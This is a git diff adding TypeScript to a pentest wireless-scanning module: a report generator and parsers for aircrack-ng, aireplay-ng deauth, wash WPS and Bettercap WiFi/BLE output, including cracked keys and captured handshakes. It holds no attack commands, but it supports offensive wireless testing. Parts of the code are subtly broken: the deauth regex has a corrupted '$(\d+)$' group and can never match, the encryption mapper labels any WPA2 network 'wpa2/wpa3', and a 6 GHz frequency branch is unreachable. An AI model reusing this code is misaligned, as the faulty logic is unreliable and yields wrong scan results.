+        rfidTagsFound: state.rfidTags.length,
+        findingsTotal: state.findings.length,
+        findingsBySeverity: {
+          critical: state.findings.filter(f => f.severity === "critical").length,
+          high: state.findings.filter(f => f.severity === "high").length,
+          medium: state.findings.filter(f => f.severity === "medium").length,
+          low: state.findings.filter(f => f.severity === "low").length,
+          info: state.findings.filter(f => f.severity === "info").length,
+        },
+        handshakesCaptured: 0,
+        rogueAPsDetected: 0,
+        duration: state.endTime ? state.endTime - state.startTime : Date.now() - state.startTime,
+      },
+      startTime: state.startTime,
+      endTime: state.endTime,
+      error: state.error,
+      // Flattened convenience fields
+      wirelessTypes: state.wirelessTypes,
+      networks: state.networks,
+      bluetoothDevices: state.bluetoothDevices,
+      rfidTags: state.rfidTags,
+    }
+  }
+
+  /**
+   * Create info-level finding.
+   */
+  function createInfoFinding(
+    scanId: string,
+    wirelessType: WirelessScanTypes.WirelessType,
+    message: string
+  ): WirelessScanTypes.WirelessFinding {
+    return {
+      id: WirelessScanStorage.createFindingId(),
+      scanId,
+      wirelessType,
+      category: "information",
+      severity: "info",
+      title: message,
+      description: message,
+      target: {
+        type: "general",
+        identifier: "system",
+        name: "System",
+      },
+      recommendation: "",
+      references: [],
+      evidence: "",
+      falsePositive: false,
+      verified: true,
+      detectedAt: Date.now(),
+    }
+  }
+
+  // ========== Baseline Management ==========
+
+  /**
+   * Create baseline from current scan.
+   */
+  export async function createBaseline(
+    scanId: string,
+    name: string
+  ): Promise<boolean> {
+    const state = activeScans.get(scanId)
+    if (!state || state.status !== "completed") return false
+
+    // Create WiFi baseline
+    if (state.networks.length > 0) {
+      const wifiBaseline = WiFiRogueAP.createBaseline(state.networks, name)
+      await WirelessScanStorage.storeBaseline("wifi", wifiBaseline)
+    }
+
+    return true
+  }
+
+  // ========== Reporting ==========
+
+  /**
+   * Generate scan report.
+   */
+  export function generateReport(scanId: string): string | null {
+    const state = activeScans.get(scanId)
+    if (!state) return null
+
+    const lines: string[] = []
+    const duration = state.endTime
+      ? Math.round((state.endTime - state.startTime) / 1000)
+      : "N/A"
+
+    lines.push("=" .repeat(60))
+    lines.push("WIRELESS SECURITY SCAN REPORT")
+    lines.push("=".repeat(60))
+    lines.push("")
+    lines.push(`Scan ID: ${state.scanId}`)
+    lines.push(`Profile: ${state.profile.name}`)
+    lines.push(`Status: ${state.status}`)
+    lines.push(`Duration: ${duration}s`)
+    lines.push(`Wireless Types: ${state.wirelessTypes.join(", ")}`)
+    lines.push("")
+
+    // Summary
+    lines.push("SUMMARY")
+    lines.push("-".repeat(40))
+    lines.push(`Networks Found: ${state.networks.length}`)
+    lines.push(`Bluetooth Devices: ${state.bluetoothDevices.length}`)
+    lines.push(`RFID Tags: ${state.rfidTags.length}`)
+    lines.push(`Total Findings: ${state.findings.length}`)
+    lines.push("")
+
+    // Findings by severity
+    const bySeverity = {
+      critical: state.findings.filter((f) => f.severity === "critical"),
+      high: state.findings.filter((f) => f.severity === "high"),
+      medium: state.findings.filter((f) => f.severity === "medium"),
+      low: state.findings.filter((f) => f.severity === "low"),
+      info: state.findings.filter((f) => f.severity === "info"),
+    }
+
+    lines.push("FINDINGS BY SEVERITY")
+    lines.push("-".repeat(40))
+    lines.push(`Critical: ${bySeverity.critical.length}`)
+    lines.push(`High: ${bySeverity.high.length}`)
+    lines.push(`Medium: ${bySeverity.medium.length}`)
+    lines.push(`Low: ${bySeverity.low.length}`)
+    lines.push(`Info: ${bySeverity.info.length}`)
+    lines.push("")
+
+    // WiFi Networks
+    if (state.networks.length > 0) {
+      lines.push("WIFI NETWORKS")
+      lines.push("-".repeat(40))
+      for (const network of state.networks) {
+        lines.push(`  ${network.ssid || "(Hidden)"} (${network.bssid})`)
+        lines.push(`    Channel: ${network.channel}, Encryption: ${network.encryption}`)
+        if (network.clients && network.clients.length > 0) {
+          lines.push(`    Clients: ${network.clients.length}`)
+        }
+      }
+      lines.push("")
+    }
+
+    // Bluetooth Devices
+    if (state.bluetoothDevices.length > 0) {
+      lines.push("BLUETOOTH DEVICES")
+      lines.push("-".repeat(40))
+      for (const device of state.bluetoothDevices) {
+        lines.push(`  ${device.name || "(Unknown)"} (${device.address})`)
+        lines.push(`    Type: ${device.type}, RSSI: ${device.rssi}dBm`)
+      }
+      lines.push("")
+    }
+
+    // RFID Tags
+    if (state.rfidTags.length > 0) {
+      lines.push("RFID/NFC TAGS")
+      lines.push("-".repeat(40))
+      for (const tag of state.rfidTags) {
+        const cardInfo = RFIDCards.getCardInfo(tag.type)
+        lines.push(`  ${cardInfo.name} (${tag.uid})`)
+        lines.push(`    Frequency: ${tag.frequency}, Security: ${cardInfo.securityLevel}`)
+      }
+      lines.push("")
+    }
+
+    // Critical and High Findings
+    const criticalHigh = [...bySeverity.critical, ...bySeverity.high]
+    if (criticalHigh.length > 0) {
+      lines.push("CRITICAL AND HIGH FINDINGS")
+      lines.push("-".repeat(40))
+      for (const finding of criticalHigh) {
+        lines.push(`[${finding.severity.toUpperCase()}] ${finding.title}`)
+        lines.push(`  Type: ${finding.wirelessType}`)
+        lines.push(`  Target: ${finding.target.name} (${finding.target.identifier})`)
+        lines.push(`  ${finding.description.slice(0, 100)}...`)
+        lines.push(`  Recommendation: ${finding.recommendation.slice(0, 100)}...`)
+        lines.push("")
+      }
+    }
+
+    lines.push("=".repeat(60))
+    lines.push("END OF REPORT")
+    lines.push("=".repeat(60))
+
+    return lines.join("\n")
+  }
+}
diff --git a/packages/opencode/src/pentest/wirelessscan/parsers/aircrack.ts b/packages/opencode/src/pentest/wirelessscan/parsers/aircrack.ts
new file mode 100644
index 00000000000..ad8b7a51a01
--- /dev/null
+++ b/packages/opencode/src/pentest/wirelessscan/parsers/aircrack.ts
@@ -0,0 +1,476 @@
+/**
+ * @fileoverview Aircrack-ng Output Parser
+ *
+ * Parses output from the Aircrack-ng suite tools:
+ * - airodump-ng CSV output
+ * - aircrack-ng results
+ * - aireplay-ng output
+ *
+ * @module pentest/wirelessscan/parsers/aircrack
+ */
+
+import { WirelessScanTypes } from "../types"
+import { WirelessScanStorage } from "../storage"
+
+/**
+ * Aircrack-ng parser namespace.
+ */
+export namespace AircrackParser {
+  // ========== Airodump-ng CSV Parser ==========
+
+  /**
+   * Parse airodump-ng CSV output for networks.
+   *
+   * CSV format:
+   * BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
+   */
+  export function parseAirodumpNetworks(csv: string): WirelessScanTypes.WiFiNetwork[] {
+    const networks: WirelessScanTypes.WiFiNetwork[] = []
+    const lines = csv.split("\n")
+
+    let inNetworkSection = false
+    let inClientSection = false
+
+    for (const line of lines) {
+      const trimmed = line.trim()
+
+      // Detect section headers
+      if (trimmed.startsWith("BSSID, First time seen")) {
+        inNetworkSection = true
+        inClientSection = false
+        continue
+      }
+      if (trimmed.startsWith("Station MAC, First time seen")) {
+        inNetworkSection = false
+        inClientSection = true
+        continue
+      }
+
+      if (!inNetworkSection || !trimmed || inClientSection) {
+        continue
+      }
+
+      const parts = trimmed.split(",").map((p) => p.trim())
+      if (parts.length < 14) continue
+
+      const [
+        bssid,
+        firstSeen,
+        lastSeen,
+        channel,
+        speed,
+        privacy,
+        cipher,
+        auth,
+        power,
+        beacons,
+        iv,
+        _lanIp,
+        _idLength,
+        essid,
+      ] = parts
+
+      // Skip invalid entries
+      if (!bssid || bssid.length !== 17) continue
+
+      const network = parseNetworkEntry({
+        bssid,
+        firstSeen,
+        lastSeen,
+        channel,
+        speed,
+        privacy,
+        cipher,
+        auth,
+        power,
+        beacons,
+        iv,
+        essid,
+      })
+
+      if (network) {
+        networks.push(network)
+      }
+    }
+
+    return networks
+  }
+
+  /**
+   * Parse airodump-ng CSV output for clients.
+   *
+   * CSV format:
+   * Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
+   */
+  export function parseAirodumpClients(csv: string): WirelessScanTypes.WiFiClient[] {
+    const clients: WirelessScanTypes.WiFiClient[] = []
+    const lines = csv.split("\n")
+
+    let inClientSection = false
+
+    for (const line of lines) {
+      const trimmed = line.trim()
+
+      // Detect client section
+      if (trimmed.startsWith("Station MAC, First time seen")) {
+        inClientSection = true
+        continue
+      }
+      if (trimmed.startsWith("BSSID, First time seen")) {
+        inClientSection = false
+        continue
+      }
+
+      if (!inClientSection || !trimmed) {
+        continue
+      }
+
+      const parts = trimmed.split(",").map((p) => p.trim())
+      if (parts.length < 6) continue
+
+      const [mac, firstSeen, lastSeen, power, packets, bssid, ...probes] = parts
+
+      // Skip invalid entries
+      if (!mac || mac.length !== 17) continue
+
+      const client = parseClientEntry({
+        mac,
+        firstSeen,
+        lastSeen,
+        power,
+        packets,
+        bssid,
+        probes: probes.join(","),
+      })
+
+      if (client) {
+        clients.push(client)
+      }
+    }
+
+    return clients
+  }
+
+  /**
+   * Parse full airodump-ng CSV output.
+   */
+  export function parseAirodumpCsv(csv: string): {
+    networks: WirelessScanTypes.WiFiNetwork[]
+    clients: WirelessScanTypes.WiFiClient[]
+  } {
+    return {
+      networks: parseAirodumpNetworks(csv),
+      clients: parseAirodumpClients(csv),
+    }
+  }
+
+  // ========== Aircrack-ng Output Parser ==========
+
+  /**
+   * Parsed handshake info from aircrack-ng.
+   */
+  export interface AircrackHandshakeInfo {
+    bssid: string
+    essid?: string
+    encryption: WirelessScanTypes.WiFiEncryption
+    handshakeType: "WPA" | "WPA2" | "WEP" | "unknown"
+    keyFound: boolean
+    key?: string
+    ivCount?: number
+  }
+
+  /**
+   * Parse aircrack-ng output for handshake information.
+   */
+  export function parseAircrackOutput(output: string): AircrackHandshakeInfo[] {
+    const results: AircrackHandshakeInfo[] = []
+    const lines = output.split("\n")
+
+    // Pattern for network entries
+    // Format: Index | BSSID | ESSID | Encryption | Key | IVs
+    const networkPattern = /^\s*(\d+)\s+([0-9A-Fa-f:]{17})\s+(.+?)\s+(WPA|WPA2|WEP|None)\s+/
+
+    // Pattern for key found
+    const keyFoundPattern = /KEY FOUND!\s*\[\s*(.+?)\s*\]/i
+
+    // Pattern for no handshake
+    const noHandshakePattern = /No valid WPA handshakes/i
+
+    let currentInfo: Partial<AircrackHandshakeInfo> | null = null
+
+    for (const line of lines) {
+      const networkMatch = line.match(networkPattern)
+      if (networkMatch) {
+        if (currentInfo?.bssid) {
+          results.push(currentInfo as AircrackHandshakeInfo)
+        }
+
+        currentInfo = {
+          bssid: networkMatch[2].toUpperCase(),
+          essid: networkMatch[3].trim(),
+          encryption: mapEncryption(networkMatch[4]),
+          handshakeType: networkMatch[4] as "WPA" | "WPA2" | "WEP" | "unknown",
+          keyFound: false,
+        }
+        continue
+      }
+
+      const keyMatch = line.match(keyFoundPattern)
+      if (keyMatch && currentInfo) {
+        currentInfo.keyFound = true
+        currentInfo.key = keyMatch[1]
+        continue
+      }
+
+      // Extract IV count for WEP
+      const ivMatch = line.match(/(\d+)\s+IVs/)
+      if (ivMatch && currentInfo) {
+        currentInfo.ivCount = parseInt(ivMatch[1], 10)
+      }
+    }
+
+    if (currentInfo?.bssid) {
+      results.push(currentInfo as AircrackHandshakeInfo)
+    }
+
+    return results
+  }
+
+  // ========== Aireplay-ng Output Parser ==========
+
+  /**
+   * Deauth attack result from aireplay-ng.
+   */
+  export interface AireplayDeauthResult {
+    targetMac: string
+    bssid: string
+    packetsSent: number
+    ackReceived: boolean
+  }
+
+  /**
+   * Parse aireplay-ng deauth output.
+   */
+  export function parseAireplayOutput(output: string): AireplayDeauthResult[] {
+    const results: AireplayDeauthResult[] = []
+    const lines = output.split("\n")
+
+    // Pattern for deauth packets
+    // Format: 12:34:56:78:90:AB -- DeAuth sent (1)
+    const deauthPattern =
+      /([0-9A-Fa-f:]{17})\s+--.*?DeAuth.*?(?:to|@)\s*([0-9A-Fa-f:]{17})?.*?sent\s*$(\d+)$/i
+    const ackPattern = /ACK/i
+
+    for (const line of lines) {
+      const match = line.match(deauthPattern)
+      if (match) {
+        results.push({
+          targetMac: match[1].toUpperCase(),
+          bssid: match[2]?.toUpperCase() || "",
+          packetsSent: parseInt(match[3], 10),
+          ackReceived: ackPattern.test(line),
+        })
+      }
+    }
+
+    return results
+  }
+
+  // ========== Wash Output Parser (WPS Detection) ==========
+
+  /**
+   * WPS info from wash output.
+   */
+  export interface WashWPSInfo {
+    bssid: string
+    channel: number
+    rssi: number
+    wpsVersion: string
+    wpsLocked: boolean
+    essid: string
+  }
+
+  /**
+   * Parse wash output for WPS-enabled networks.
+   *
+   * Format:
+   * BSSID               Ch  dBm  WPS  Lck  Vendor    ESSID
+   * 00:11:22:33:44:55    6  -45  2.0  No   RalinkTe  NetworkName
+   */
+  export function parseWashOutput(output: string): WashWPSInfo[] {
+    const results: WashWPSInfo[] = []
+    const lines = output.split("\n")
+
+    for (const line of lines) {
+      const trimmed = line.trim()
+
+      // Skip header and empty lines
+      if (
+        !trimmed ||
+        trimmed.startsWith("BSSID") ||
+        trimmed.startsWith("Wash") ||
+        trimmed.startsWith("-")
+      ) {
+        continue
+      }
+
+      // Parse line
+      const parts = trimmed.split(/\s+/)
+      if (parts.length < 6) continue
+
+      const bssid = parts[0]
+      if (!bssid || bssid.length !== 17) continue
+
+      const channel = parseInt(parts[1], 10)
+      const rssi = parseInt(parts[2], 10)
+      const wpsVersion = parts[3]
+      const locked = parts[4]?.toLowerCase() === "yes"
+      const essid = parts.slice(6).join(" ") || ""
+
+      results.push({
+        bssid: bssid.toUpperCase(),
+        channel,
+        rssi,
+        wpsVersion,
+        wpsLocked: locked,
+        essid,
+      })
+    }
+
+    return results
+  }
+
+  // ========== Helper Functions ==========
+
+  function parseNetworkEntry(entry: {
+    bssid: string
+    firstSeen: string
+    lastSeen: string
+    channel: string
+    speed: string
+    privacy: string
+    cipher: string
+    auth: string
+    power: string
+    beacons: string
+    iv: string
+    essid: string
+  }): WirelessScanTypes.WiFiNetwork | null {
+    const channel = parseInt(entry.channel, 10)
+    if (isNaN(channel)) return null
+
+    const signal = parseInt(entry.power, 10)
+    const beacons = parseInt(entry.beacons, 10) || 0
+
+    return {
+      id: WirelessScanStorage.createNetworkId(),
+      bssid: entry.bssid.toUpperCase(),
+      essid: entry.essid || "<hidden>",
+      channel,
+      frequency: channelToFrequency(channel),
+      band: channel <= 14 ? "2.4ghz" : channel <= 177 ? "5ghz" : "6ghz",
+      signal: isNaN(signal) ? -100 : signal,
+      encryption: mapEncryption(entry.privacy),
+      cipher: mapCipher(entry.cipher),
+      authentication: mapAuth(entry.auth),
+      wps: false,
+      wpsLocked: false,
+      hidden: !entry.essid || entry.essid === "",
+      beacons,
+      dataPackets: parseInt(entry.iv, 10) || 0,
+      clients: [],
+      firstSeen: parseAirodumpDate(entry.firstSeen),
+      lastSeen: parseAirodumpDate(entry.lastSeen),
+    }
+  }
+
+  function parseClientEntry(entry: {
+    mac: string
+    firstSeen: string
+    lastSeen: string
+    power: string
+    packets: string
+    bssid: string
+    probes: string
+  }): WirelessScanTypes.WiFiClient | null {
+    const signal = parseInt(entry.power, 10)
+    const packets = parseInt(entry.packets, 10) || 0
+
+    // Parse probes - comma separated
+    const probes = entry.probes
+      .split(",")
+      .map((p) => p.trim())
+      .filter((p) => p && p !== "(not associated)")
+
+    // Check if associated (BSSID is not "(not associated)")
+    const associated = !!(entry.bssid && entry.bssid !== "(not associated)" && entry.bssid.length === 17)
+
+    return {
+      id: WirelessScanStorage.createDeviceId(),
+      mac: entry.mac.toUpperCase(),
+      bssid: associated ? entry.bssid.toUpperCase() : undefined,
+      signal: isNaN(signal) ? undefined : signal,
+      packets,
+      probes,
+      associated,
+      firstSeen: parseAirodumpDate(entry.firstSeen),
+      lastSeen: parseAirodumpDate(entry.lastSeen),
+    }
+  }
+
+  function mapEncryption(privacy: string): WirelessScanTypes.WiFiEncryption {
+    const p = privacy.toUpperCase()
+    if (p.includes("WPA3")) return "wpa3"
+    if (p.includes("WPA2") && p.includes("WPA")) return "wpa2/wpa3"
+    if (p.includes("WPA2")) return "wpa2"
+    if (p.includes("WPA")) return "wpa"
+    if (p.includes("WEP")) return "wep"
+    if (p.includes("OPN") || p.includes("OPEN") || p === "") return "open"
+    return "unknown"
+  }
+
+  function mapCipher(cipher: string): WirelessScanTypes.WiFiCipher {
+    const c = cipher.toUpperCase()
+    if (c.includes("CCMP")) return "ccmp"
+    if (c.includes("TKIP")) return "tkip"
+    if (c.includes("WEP")) return "wep"
+    if (c.includes("GCMP")) return "gcmp"
+    if (c === "" || c === "NONE") return "none"
+    return "unknown"
+  }
+
+  function mapAuth(auth: string): WirelessScanTypes.WiFiAuth {
+    const a = auth.toUpperCase()
+    if (a.includes("PSK")) return "psk"
+    if (a.includes("SAE")) return "sae"
+    if (a.includes("MGT") || a.includes("EAP")) return "eap"
+    if (a.includes("OWE")) return "owe"
+    if (a === "" || a === "OPN" || a === "OPEN") return "open"
+    return "unknown"
+  }
+
+  function channelToFrequency(channel: number): number {
+    // 2.4 GHz band
+    if (channel >= 1 && channel <= 13) {
+      return 2407 + channel * 5
+    }
+    if (channel === 14) {
+      return 2484
+    }
+    // 5 GHz band
+    if (channel >= 36 && channel <= 177) {
+      return 5000 + channel * 5
+    }
+    // 6 GHz band
+    if (channel >= 1 && channel <= 233) {
+      return 5950 + channel * 5
+    }
+    return 0
+  }
+
+  function parseAirodumpDate(dateStr: string): number {
+    // Format: 2024-01-20 15:30:45
+    const date = new Date(dateStr.replace(" ", "T"))
+    return isNaN(date.getTime()) ? Date.now() : date.getTime()
+  }
+}
diff --git a/packages/opencode/src/pentest/wirelessscan/parsers/bettercap.ts b/packages/opencode/src/pentest/wirelessscan/parsers/bettercap.ts
new file mode 100644
index 00000000000..71cc15206cc
--- /dev/null
+++ b/packages/opencode/src/pentest/wirelessscan/parsers/bettercap.ts
@@ -0,0 +1,473 @@
+/**
+ * @fileoverview Bettercap Output Parser
+ *
+ * Parses output from Bettercap network attack framework:
+ * - WiFi module output
+ * - BLE module output
+ * - Events and handshakes
+ *
+ * @module pentest/wirelessscan/parsers/bettercap
+ */
+
+import { WirelessScanTypes } from "../types"
+import { WirelessScanStorage } from "../storage"
+
+/**
+ * Bettercap parser namespace.
+ */
+export namespace BettercapParser {
+  // ========== Bettercap WiFi Types ==========
+
+  /**
+   * Bettercap WiFi AP structure.
+   */
+  export interface BettercapAP {
+    mac: string
+    hostname: string
+    alias: string
+    vendor: string
+    frequency: number
+    channel: number
+    rssi: number
+    encryption: string
+    cipher: string
+    authentication: string
+    wps: boolean
+    handshake: boolean
+    pmkid: boolean
+    clients: BettercapClient[]
+    first_seen: string
+    last_seen: string
+  }
+
+  /**
+   * Bettercap WiFi client structure.
+   */
+  export interface BettercapClient {
+    mac: string
+    vendor: string
+    rssi: number
+    probe: string[]
+    first_seen: string
+    last_seen: string
+  }
+
+  /**
+   * Bettercap BLE device structure.
+   */
+  export interface BettercapBLEDevice {
+    mac: string
+    name: string
+    vendor: string
+    rssi: number
+    connectable: boolean
+    flags: string[]
+    services: BettercapBLEService[]
+    first_seen: string
+    last_seen: string
+  }
+
+  /**
+   * Bettercap BLE service structure.
+   */
+  export interface BettercapBLEService {
+    uuid: string
+    name: string
+    characteristics: BettercapBLECharacteristic[]
+  }
+
+  /**
+   * Bettercap BLE characteristic structure.
+   */
+  export interface BettercapBLECharacteristic {
+    uuid: string
+    name: string
+    properties: string[]
+    data?: string
+  }
+
+  // ========== WiFi Parsing ==========
+
+  /**
+   * Parse Bettercap wifi.show JSON output.
+   */
+  export function parseWifiShow(json: string): {
+    networks: WirelessScanTypes.WiFiNetwork[]
+    clients: WirelessScanTypes.WiFiClient[]
+  } {
+    const networks: WirelessScanTypes.WiFiNetwork[] = []
+    const clients: WirelessScanTypes.WiFiClient[] = []
+
+    let data: BettercapAP[]
+    try {
+      data = JSON.parse(json)
+      if (!Array.isArray(data)) {
+        return { networks, clients }
+      }
+    } catch {
+      return { networks, clients }
+    }
+
+    for (const ap of data) {
+      const network = parseAP(ap)
+      if (network) {
+        networks.push(network)
+      }
+
+      // Parse clients associated with this AP
+      if (ap.clients) {
+        for (const client of ap.clients) {
+          const parsedClient = parseClient(client, ap.mac)
+          if (parsedClient) {
+            clients.push(parsedClient)
+          }
+        }
+      }
+    }
+
+    return { networks, clients }
+  }
+
+  /**
+   * Parse Bettercap events output.
+   */
+  export interface BettercapEvent {
+    tag: string
+    time: string
+    data: Record<string, unknown>
+  }
+
+  /**
+   * Parse Bettercap events JSON.
+   */
+  export function parseEvents(json: string): {
+    handshakes: WirelessScanTypes.HandshakeCapture[]
+    deauths: WirelessScanTypes.DeauthAttack[]
+    rogueAPs: WirelessScanTypes.RogueAP[]
+  } {
+    const handshakes: WirelessScanTypes.HandshakeCapture[] = []
+    const deauths: WirelessScanTypes.DeauthAttack[] = []
+    const rogueAPs: WirelessScanTypes.RogueAP[] = []
+
+    let events: BettercapEvent[]
+    try {
+      events = JSON.parse(json)
+      if (!Array.isArray(events)) {
+        return { handshakes, deauths, rogueAPs }
+      }
+    } catch {
+      return { handshakes, deauths, rogueAPs }
+    }
+
+    for (const event of events) {
+      switch (event.tag) {
+        case "wifi.client.handshake":
+          handshakes.push(parseHandshakeEvent(event))
+          break
+        case "wifi.ap.new":
+        case "wifi.deauth":
+          // Could be rogue AP or deauth attack
+          if (event.data.deauth) {
+            deauths.push(parseDeauthEvent(event))
+          }
+          break
+      }
+    }
+
+    return { handshakes, deauths, rogueAPs }
+  }
+
+  // ========== BLE Parsing ==========
+
+  /**
+   * Parse Bettercap ble.show JSON output.
+   */
+  export function parseBleShow(json: string): WirelessScanTypes.BluetoothDevice[] {
+    const devices: WirelessScanTypes.BluetoothDevice[] = []
+
+    let data: BettercapBLEDevice[]
+    try {
+      data = JSON.parse(json)
+      if (!Array.isArray(data)) {
+        return devices
+      }
+    } catch {
+      return devices
+    }
+
+    for (const bleDevice of data) {
+      const device = parseBLEDevice(bleDevice)
+      if (device) {
+        devices.push(device)
+      }
+    }
+
+    return devices
+  }
+
+  // ========== Text Output Parsing ==========
+
+  /**
+   * Parse Bettercap wifi.show text output.
+   *
+   * Format:
+   * RSSI | MAC | Encryption | Channel | Clients | Hostname
+   * -----+-----+------------+---------+---------+----------
+   * -50  | XX:XX... | WPA2 | 6 | 2 | MyNetwork
+   */
+  export function parseWifiShowText(text: string): WirelessScanTypes.WiFiNetwork[] {
+    const networks: WirelessScanTypes.WiFiNetwork[] = []
+    const lines = text.split("\n")
+
+    // Find the separator line to determine column positions
+    let headerFound = false
+
+    for (const line of lines) {
+      const trimmed = line.trim()
+
+      if (trimmed.includes("---") || trimmed.includes("===")) {
+        headerFound = true
+        continue
+      }
+
+      if (!headerFound || !trimmed || !trimmed.includes("|")) {
+        continue
+      }
+
+      const parts = trimmed.split("|").map((p) => p.trim())
+      if (parts.length < 5) continue
+
+      const rssi = parseInt(parts[0], 10)
+      const mac = parts[1]
+      const encryption = parts[2]
+      const channel = parseInt(parts[3], 10)
+      // const clients = parseInt(parts[4], 10)
+      const hostname = parts[5] || ""
+
+      if (!mac || mac.length !== 17) continue
+
+      networks.push({
+        id: WirelessScanStorage.createNetworkId(),
+        bssid: mac.toUpperCase(),
+        essid: hostname || "<hidden>",
+        channel,
+        frequency: channelToFrequency(channel),
+        band: channel <= 14 ? "2.4ghz" : channel <= 177 ? "5ghz" : "6ghz",
+        signal: rssi,
+        encryption: mapEncryption(encryption),
+        cipher: mapCipher(encryption),
+        authentication: mapAuth(encryption),
+        wps: encryption.toLowerCase().includes("wps"),
+        wpsLocked: false,
+        hidden: !hostname,
+        beacons: 0,
+        dataPackets: 0,
+        clients: [],
+        firstSeen: Date.now(),
+        lastSeen: Date.now(),
+      })
+    }
+
+    return networks
+  }
+
+  /**
+   * Parse Bettercap ble.show text output.
+   */
+  export function parseBleShowText(text: string): WirelessScanTypes.BluetoothDevice[] {
+    const devices: WirelessScanTypes.BluetoothDevice[] = []
+    const lines = text.split("\n")
+
+    let headerFound = false
+
+    for (const line of lines) {
+      const trimmed = line.trim()
+
+      if (trimmed.includes("---") || trimmed.includes("===")) {
+        headerFound = true
+        continue
+      }
+
+      if (!headerFound || !trimmed || !trimmed.includes("|")) {
+        continue
+      }
+
+      const parts = trimmed.split("|").map((p) => p.trim())
+      if (parts.length < 4) continue
+
+      const rssi = parseInt(parts[0], 10)
+      const mac = parts[1]
+      const name = parts[2]
+      const vendor = parts[3]
+
+      if (!mac || mac.length !== 17) continue
+
+      devices.push({
+        id: WirelessScanStorage.createDeviceId(),
+        address: mac.toUpperCase(),
+        name: name || undefined,
+        type: "ble",
+        rssi,
+        manufacturer: vendor || undefined,
+        services: [],
+        serviceUuids: [],
+        uuids: [],
+        paired: false,
+        connected: false,
+        trusted: false,
+        blocked: false,
+        firstSeen: Date.now(),
+        lastSeen: Date.now(),
+      })
+    }
+
+    return devices
+  }
+
+  // ========== Helper Functions ==========
+
+  function parseAP(ap: BettercapAP): WirelessScanTypes.WiFiNetwork | null {
+    if (!ap.mac || ap.mac.length !== 17) return null
+
+    return {
+      id: WirelessScanStorage.createNetworkId(),
+      bssid: ap.mac.toUpperCase(),
+      essid: ap.hostname || ap.alias || "<hidden>",
+      channel: ap.channel,
+      frequency: ap.frequency || channelToFrequency(ap.channel),
+      band: ap.channel <= 14 ? "2.4ghz" : ap.channel <= 177 ? "5ghz" : "6ghz",
+      signal: ap.rssi,
+      encryption: mapEncryption(ap.encryption),
+      cipher: mapCipher(ap.cipher),
+      authentication: mapAuth(ap.authentication),
+      wps: ap.wps,
+      wpsLocked: false,
+      hidden: !ap.hostname && !ap.alias,
+      vendor: ap.vendor,
+      beacons: 0,
+      dataPackets: 0,
+      clients: ap.clients?.map((c) => c.mac.toUpperCase()) || [],
+      pmkidVulnerable: ap.pmkid || ap.handshake,
+      firstSeen: new Date(ap.first_seen).getTime() || Date.now(),
+      lastSeen: new Date(ap.last_seen).getTime() || Date.now(),
+    }
+  }
+
+  function parseClient(client: BettercapClient, bssid: string): WirelessScanTypes.WiFiClient | null {
+    if (!client.mac || client.mac.length !== 17) return null
+
+    return {
+      id: WirelessScanStorage.createDeviceId(),
+      mac: client.mac.toUpperCase(),
+      bssid: bssid.toUpperCase(),
+      signal: client.rssi,
+      vendor: client.vendor,
+      probes: client.probe || [],
+      associated: true,
+      packets: 0,
+      firstSeen: new Date(client.first_seen).getTime() || Date.now(),
+      lastSeen: new Date(client.last_seen).getTime() || Date.now(),
+    }
+  }
+
+  function parseBLEDevice(device: BettercapBLEDevice): WirelessScanTypes.BluetoothDevice | null {
+    if (!device.mac || device.mac.length !== 17) return null
+
+    const services: WirelessScanTypes.BLEService[] = (device.services || []).map((svc) => ({
+      uuid: svc.uuid,
+      name: svc.name,
+      primary: true,
+      characteristics: (svc.characteristics || []).map((char) => ({
+        uuid: char.uuid,
+        name: char.name,
+        properties: char.properties || [],
+        value: char.data,
+        readable: char.properties?.includes("read") || false,
+        writable: char.properties?.includes("write") || false,
+        notifiable: char.properties?.includes("notify") || false,
+      })),
+    }))
+
+    return {
+      id: WirelessScanStorage.createDeviceId(),
+      address: device.mac.toUpperCase(),
+      name: device.name,
+      type: "ble",
+      rssi: device.rssi,
+      manufacturer: device.vendor,
+      services,
+      serviceUuids: services.map((s) => s.uuid),
+      uuids: services.map((s) => s.uuid),
+      paired: false,
+      connected: device.connectable,
+      trusted: false,
+      blocked: false,
+      firstSeen: new Date(device.first_seen).getTime() || Date.now(),
+      lastSeen: new Date(device.last_seen).getTime() || Date.now(),
+    }
+  }
+
+  function parseHandshakeEvent(event: BettercapEvent): WirelessScanTypes.HandshakeCapture {
+    const data = event.data
+    return {
+      id: WirelessScanStorage.createNetworkId(),
+      bssid: String(data.ap || "").toUpperCase(),
+      essid: data.essid as string | undefined,
+      clientMac: String(data.station || "").toUpperCase(),
+      type: data.pmkid ? "pmkid" : data.full ? "4-way" : "half",
+      complete: Boolean(data.full),
+      filePath: data.file as string | undefined,
+      capturedAt: new Date(event.time).getTime() || Date.now(),
+    }
+  }
+
+  function parseDeauthEvent(event: BettercapEvent): WirelessScanTypes.DeauthAttack {
+    const data = event.data
+    return {
+      id: WirelessScanStorage.createNetworkId(),
+      sourceMac: String(data.source || "").toUpperCase(),
+      targetMac: String(data.target || "").toUpperCase(),
+      bssid: String(data.ap || "").toUpperCase(),
+      count: Number(data.count) || 1,
+      reason: Number(data.reason),
+      startTime: new Date(event.time).getTime() || Date.now(),
+      lastSeen: new Date(event.time).getTime() || Date.now(),
+    }
+  }
+
+  function mapEncryption(enc: string): WirelessScanTypes.WiFiEncryption {
+    const e = (enc || "").toUpperCase()
+    if (e.includes("WPA3")) return "wpa3"
+    if (e.includes("WPA2") && e.includes("WPA")) return "wpa2/wpa3"
+    if (e.includes("WPA2")) return "wpa2"
+    if (e.includes("WPA")) return "wpa"
+    if (e.includes("WEP")) return "wep"
+    if (e.includes("OPEN") || e === "") return "open"
+    return "unknown"
+  }
+
+  function mapCipher(cipher: string): WirelessScanTypes.WiFiCipher {
+    const c = (cipher || "").toUpperCase()
+    if (c.includes("CCMP") || c.includes("AES")) return "ccmp"
+    if (c.includes("TKIP")) return "tkip"
+    if (c.includes("GCMP")) return "gcmp"
+    if (c.includes("WEP")) return "wep"
+    return "none"
+  }
+
+  function mapAuth(auth: string): WirelessScanTypes.WiFiAuth {
+    const a = (auth || "").toUpperCase()
+    if (a.includes("PSK")) return "psk"
+    if (a.includes("SAE")) return "sae"
+    if (a.includes("EAP") || a.includes("802.1X") || a.includes("MGT")) return "eap"
+    if (a.includes("OWE")) return "owe"
+    return "open"
+  }
+
+  function channelToFrequency(channel: number): number {
+    if (channel >= 1 && channel <= 13) return 2407 + channel * 5
+    if (channel === 14) return 2484
